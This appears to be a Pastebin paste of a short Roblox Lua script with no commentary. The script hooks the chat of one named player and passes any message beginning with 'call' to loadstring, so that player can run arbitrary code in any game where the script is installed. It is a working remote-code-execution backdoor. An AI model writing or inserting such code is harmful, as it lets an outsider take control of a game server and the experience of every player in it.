Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- game:GetService("Players").PetKunggamer.Chatted:Connect(function(message)
- if string.sub(message,1,3) == "/e " then
- message = string.sub(message,4)
- end
- if string.sub(message,1,4) == "call" then
- loadstring(string.sub(message,6))()
- end
- end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement